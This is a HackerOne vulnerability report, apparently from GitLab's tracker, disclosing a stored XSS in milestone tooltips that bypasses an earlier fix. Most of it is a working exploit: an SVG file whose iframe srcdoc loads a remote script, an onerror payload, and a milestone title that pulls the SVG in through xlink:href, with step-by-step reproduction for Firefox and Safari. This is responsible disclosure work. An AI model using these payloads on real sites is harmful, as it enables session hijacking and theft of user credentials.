Stored XSS in milestone tooltips
HackerOne report #1054401 by mike12
on 2020-12-08, assigned to @ngeorge1:
Report | Attachments | How To Reproduce
Report
Hi Gitlab!
I found a way to bypass the fix for my old report. See the vulnerable code.
This XSS works for:
- gitlab.com using Firefox (tested in Firefox 83.0)
- A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1)
Steps to reproduce using Firefox
-
Open your browser and navigate to https://gitlab.com
-
Create a new project
-
Add a file named
demo.svg
to the project with the following content:<svg id="x" xmlns="http://www.w3.org/2000/svg" width="100" height="100" > <!-- gitlab.com using Firefox --> <foreignObject> <iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc='&lt;script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js&gt; &lt;/script&gt;'></iframe> </foreignObject> <!-- A self-hosted GitLab instance without CSP using Safari --> <image href="foo" onerror="alert('onerror')"/> </svg>
-
Navigate to Issues > Milestones
-
Create a new milestone with the following title:
&lt;svg width=&quot;100&quot;&gt;&lt;use xlink:href=&quot;/<YOUR-USERNAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x&quot; /&gt;&lt;/svg&gt;
(Replace<YOUR-USERNAME>
and<YOUR-PROJECT>
with your values) -
Navigate to Issues > List
-
Create a new issue
-
Click the milestone icon in the right sidebar
-
Select the milestone created in step 5
-
Hover your mouse over the milestone icon
Steps to reproduce using Safari
- Run a self-hosted Gitlab instance
- Repeat steps 2 through 11 from the "Steps to reproduce using Firefox" section.
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data, including credentials
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: